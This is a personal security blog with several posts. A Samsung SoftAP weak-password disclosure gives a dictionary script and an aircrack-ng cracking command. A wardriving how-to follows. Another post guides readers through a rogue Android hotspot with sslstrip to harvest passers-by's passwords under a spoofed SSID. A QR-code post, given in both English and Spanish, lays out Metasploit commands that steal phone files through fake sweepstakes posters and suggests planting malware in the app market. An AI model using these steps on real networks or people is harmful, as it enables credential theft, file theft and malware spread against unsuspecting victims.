jueves, 17 de diciembre de 2015

Samsung Smarttv and Printers weak password SoftAP wpa2

Samsung SoftAP weak default password


Many devices created by Samsung has an special way to interact called in some cases wifi-direct and in other cases softAP this feature is only some kind of access point with an DHCP server integrated. For example if some user want to print a document using this functionality just must search the SSID of the printer then join his PC or cellphone to it and send the document. With Smarttv occurs something similar but it will show an image or will reproduce video or music.

The vulnerability


Let’s see how look like a password of Softap functionality from a smarttv

If you see this the password always will be a number under 100000000




Here you can see the same example in a printer





Always the security of the softap uses WPA2 but if you capture a handshake using aircrack just sniffing in the air is 100% possible crack the password in less than 14 hours using a modern desktop computer.
So you can send content to the printer and smart tv without anything can stop it.


This code will generate an 800 MB dictionary

dictgen.py
---------------------------------------------------------------------------

count = 0

while (count < 100000000):

   print str(count).zfill(8)

   count = count + 1

---------------------------------------------------------------------------------

Just run this:
python dictgen.py >dictionary.txt

 You can download a sample pcap with a handshake from a printer here or smarttv from here
         
If you want to test it use aircrack-ng with the previously generated dictionary
The syntax is the following:
aircrack-ng printer.pcap –w dictionary.txt
Now you need to wait a little bit more than a half day to get the password

When finish you will see something like the following image



Now you have ip connectivity with the tv or printer and the clients

You could intercept all files in transit, in the case of printers could have important information as contracts, confidential documents, etc. 

Also you could reproduce arbitrary content in some cases on the smarttv using some dnla/upnp software.

Fix and workaround
Any of the following options could be used.

Option 1- Make your password stronger: It's a good idea change the password using lowers, CAPS and numbers with 8 to 15 characters.

Option 2- Shutting down the service: If you don't use this functionality  just disable it.

Option 3- Download official patch: It depends of your model.
Go to http://www.samsung.com search your patch according your model (if it's available) 

Vulnerable models

SmartTVs








Printers

May be all Xpress series 
Confirmed in M288OFW


It could affect more models than listed here
-------------------------------------------------
Samsung give me a reward :) 

https://samsungtvbounty.com/HallofFame.aspx




lunes, 30 de septiembre de 2013

How use your smart phone like as a wardriving station

Why people do wardriving with a notebook? 
It can be done with a smartphone with android just following 10 simple steps

1- download wiglewifi from google play


 2- After installation is complete activate GPS
 2- When you run it, this app will start capture all ssid of the wifi around us
4- In the option MAPA you will see every wifi network on his potition in the map (i don't show my capture of my networks because i don't want show where i live)


5- In the option  RESUMEN we can see values of the captures


6- We can exports all our captures (KML format is my favorite)

 8- run it
 9- Choose your kml file extracted from your celphone
 10- Look what you capture in the map

Enjoy

viernes, 27 de septiembre de 2013

How to make pishing using an smartphone




Hi everybody:

I want to show you how share your internet connection of your smartphone and take all passwords of the clients who use it


This is the way how it works
Minimum Requirement

Android 4.0.4 or less (after 4.0.4 change the way of tetthering in android 4.1.2 so all this tool is useless after this version)
Rooted Smartphone dual core or +



Instalation.

1) Root your device (it must have dual core)
2)Download complete linux installer from google play
3)Dowload console from google play
4)Download Mobile Fisherman and uncompress it into your external sd of your smartphone

Configuration

1)Start Complete Linux installer

2)Run it


3) Select the image downloaded of Mobile Fisherman

Choose a Name for example Mobile Fisherman

Choose the image downloaded of our Ubuntu Mobile Fisher
When the following image are displayed save everything

We are ready to run it so do it

Runing the attack



 This is the screen when its starting ubuntu



When Ubuntu is starting it let you choose wich GUI you want but its not important. Just  press enter

Run ./m.pl

 Wellcome to menu
If you select 1 you will start ssl strip attack 

 Start tettering on your smartphone (it's teorically posible start tettering from ubuntu but iwconfig don't let me use master mode and i was trying to use airbase-ng but it's not working)
You must enter in Wi-Fi Zone and modem USB



Choose a name of your fake access point. Use for example something like link$y$. You know what i mean. (:P) or use the name of your "laboratory"  for example some attacker could use the same ssid of the wifi of the place where he is right now to  take credentials of the attracted clients to his fake access point






































 


































































Start the access point




Now you can press any key to start the attack you must just wait



 In this capture you can see the many mac address asking to our evil dhcp


When the victim login into a web application and send his credentials it will be logged into our smartphone in /external_sd/atlogs/sslstrip/



If you open the log i will see something like this





sábado, 10 de septiembre de 2011

Using QR tags to Attack SmartPhones (Attaging)


If someone told you that a computer attack can be launched from a printed paper. Do you think it's possible?

And if I told you that your smartphone is a device that can be attacked  by this kind of source?  Could you believe it?

Well, I will tell you. This is possible!

Probably if we know in some depth to use some of the advanced uses that can be made from these kind of devices, we will be familiar with bar codes or bidimentional code (Qr) .An example of this kind of code is the picture shown below.



This kind of code can transmit many type of information to the smartphones, Some things that can be transmitted are, web links, phones numbers, sms, text, etc.

People are unable to distinguish what is stored inside de image until it is scanned by our smartphone. Some software like ScanLife software redirects the user without showing where you are going. This is a serious problem since this is the equivalent of clicking a link with your eyes closed. In some cases where the software displays the contained info before the connection will be made can be corrected with a little of social engineering. For example we can put a code in a fake advertising, you can also get a domain related to the fake advertising in dyndns.
  If you stand watching some code that is placed in a supermarket will be many people scanning it.



Almost the people scan every code they see just to see it, without interest for the safety of their phones.
Taking advantage of the user currently ignores the danger of his actions

Some of the possible attacks include:

Attaging+ metasploit

One way to attack using metasploit and attaging consist in put a metasploit listening some port in the attacker’s machine. Later you must create a Qr tag with a url inside pointed to the evil server listening with metasploit.

To attract some victims, for example, we can put up posters offering to participate in a sweepstakes or cheat the user telling him “come on Download the latest mp3 of Shakira or scan this code and win a coke, etc, etc. When the user scans the code is taken to the attacker trap.


To setup metasploit to accomplish this, you must to do the next steps:
. /msfconsole

Once the console is running, you must type this

use gather/android_htmlfileprovider

set FILES system/etc/hosts
This is the file we're going to steal of the phone. For example, we get the hosts file (if it’s not set this exploit will try to obtain this files /proc/version /proc/self/status, /data/system/packages.list)

set URIPATH /

set SRVPORT  80
If this value is not set this will star listening on port 8080

run

We set up a dyndns domain and attach it to our internet router for example kocakola.dyndns.tv

Now we must publish to internet our metasploit's port in our internet router.

For example should looks like this:

METASPLOIT: 8080 <----ROUTER:80<---------INTERNET <-----SMARTPHONE READER OF QR


The next step is build a qr that the people can scan with their smartphone. So we must go to the following url:






Once we have the site up, we must generate the label pointed to our evil site (in this example the tag is pointed to http://kokakola.dynds.tv/)

Now is the moment to get in action, so we must put our posters advertising that convinces people to read our code with their scanners. They can be stickers, stamps and more effective advertising with false promises, for example: "Participate in a raffle for a house scanning this code!"



Attaging + malware

The infrastructure is similar to that described above, the only thing that changes is inviting the victim cheating him to download a malicious application (trojans keyloggers, etc.) and instead of using metasploit we must use a webserver to host the malicious files. This is effective when the device is to enable  debug mode in the case of android.
to increase the effectiveness you can add the application to the android market, this allows you to install malware without having enable the debug mode. It will not be the first malware hosted in the market.



Defacement of posters
After such a kind of attacks exist defacement of posters printed on paper is now possible, the way to do this is  replacing a legitimate advertising code printed on a poster, with a sticker overlay that will redirects the user to another site controlled by an attacker.
An example might be a famous Argentinian appliance store
 were i found this tag over a refrigerator  where I took
 the following picture:




So be careful with all what you scan !..... there may be someone bad waiting for you.
More news in a few days.



I hope you liked
I always say "my english sucks" (thanks to google translator) :P 
Augusto Pereyra
apereyra (at) gmail.com


viernes, 9 de septiembre de 2011

Using QR tags to Attack SmartPhones (Attaging)

Si alguien te dijera que puede disparar un ataque informático desde un papel impreso? Pensarías que es posible?

Y si te dijera que tu smartphone es uno de los dispositivos que pueden ser atacado de esta forma ¿ Lo creerías?

Bueno si es posible!

Probablemente si conocemos en con cierta profundidad a utilizar las funciones que pueden realizarse desde este tipo de dispositivos, estaremos familiarizados con los códigos de barras o con sus primos los códigos bidimensionales o QR. Un ejemplo de esto es la imagen que se muestra a continuación



Este tipo de código permite transmitir información  a los smartphones de muchos tipos, entre las cosas que se pueden transmitir existen links web, teléfonos, sms , textos, etc.

Las personas somos incapaces de distinguir a simple vista a donde nos llevara o  que tipo de información contiene este tipo de código hasta que es escaneado por nuestro smartphone. Algunos software como el soft ScanLife redirige el usuario sin mostrarle a donde se esta dirigiendo. Esto es un serio problema ya que esto es el equivalente a hacer clic a un link con los ojos cerrados. En aquellos casos en los que el software muestra en pantalla a donde se dirigirá puede corregirse con un poco de ingeniería social más. Por ejemplo lo podemos colocar en una publicidad falsa y armamos un dominio en dyndns que sea similar a la publicidad.

 Si se paran frente aun código que esta pegado en un centro comercial verán a muchas personas escaneándolos.

Casi lo escanean simplemente para ver que es, sin interesarles mucho la seguridad de sus Celulares.
Aprovechando que el usuario actualmente ignora la peligrosidad de sus acciones, sumandole que muchos lectores redirigen automaticamente y sumando un poco de ingenieria social  se pueden disparar una variedad de ataques distintos.

Algunos de los ataques posibles son los siguientes:


Attaging + metasploit:

Este ataque consiste en levantar metasploit escuchando en una ip y un puerto en la maquina de un atacante y crear una etiqueta que lleve al smartphone a la maquina del atacante. 

Algunos pensaran que  nadie scanearia un QR por motu proprio, pero esta técnica permite fácilmente engañar al usuario.  Para motivarlo, como ejemplos podemos pegar carteles que ofrezcan participar de un sorteo o bajate el ultimo tema de Shakira, ganate una cocacola scaneando este código, etc ,etc. Cuando el usuario escanea el código es dirigido al metasploit y ya pueden imaginarse como continua.

Para preparar el escenario levantamos metasploit con de la siguiente forma:


./msfconsole

Una ves en la consola tipeamos lo siguiente

use gather/android_htmlfileprovider

set FILES system/etc/hosts
Esto es el archivo que vamos a robar del celular. Por ejemplo podemos sacar el archivo host (si no es setado intenta obener /proc/version,/proc/self/status,/data/system/packages.list)

set URIPATH /

set SRVPORT 80
Esto si no es setedo se pone a escuchar en el puerto 8080

run

Configuramos un dominio en dyndns y lo asociamos a nuestro router de internet por ejemplo: kocakola.dyndns.tv

Publicamos mediante un port forwarding en nuestro router la direccion interna de nuestro metasploit con su respectivo puerto.

por ejemplo deberia quedar asi:

METASPLOIT: 8080 <----ROUTER:80< ---------INTERNET <-----SMARTPHONE QUE LEE QR
Graficamente quedaria algo asi (no dibuje el router)



Lo siguiente es armar una etiqueta que la gente pueda scanear, para eso nos dirigimos a:



Una vez que estamos en el sitio generamos la etiqueta de nuestro sitio (en el ejemplo se creo la etiqueta para http://kokakola.dynds.tv/)

Lo que falta hora es ponerlo en un cartel publicitario, que convenza a la gente a scanear nuestro código. Pueden ser calcomanías, sellos y los mas efectivos publicidades con falsas promesas, por ejemplo participe de un sorteo por una casa escaneando este código.




Attaging + malware
La infraestructura es similar a la descripta en el punto anterior, lo único que cambia es que se invita a la victima mediante engaños a que descargue una aplicación maliciosa (troyanos keyloggers, etc) y en vez de usar metasploit usamos un webserver, hosteando los archivos maliciosos. Esto es efectivo cuando el dispositivo se encuentra con el debbug mode enable en el caso de android.
En ultima instancia para sumarle efectividad se puede subir la aplicación al market, esto permite instalar el malware sin que tenga el debug mode enable. No va a ser la primera vez que suben aplicaciones maliciosas al market.

Defacement de carteles publicitarios

Después de este tipo de ataques nacen los defacement de carteles impresos en papel, y consiste en reemplazar un código legítimo de una publicidad impresa en algún cartel publicitario, con una calcomanía superpuesta que dirija al usuario a otro sitio controlado por un atacante.
Un ejemplo puede ser las heladeras de una famosa empresa de electrodoméstico de donde se extrajo la siguiente imagen:





Asi que cuidado con lo que escaneas!..... puede haber alguien malo esperandote.
Mas novedades en estos dias.

Espero les haya gustado

Augusto Pereyra
apereyra (at) gmail.com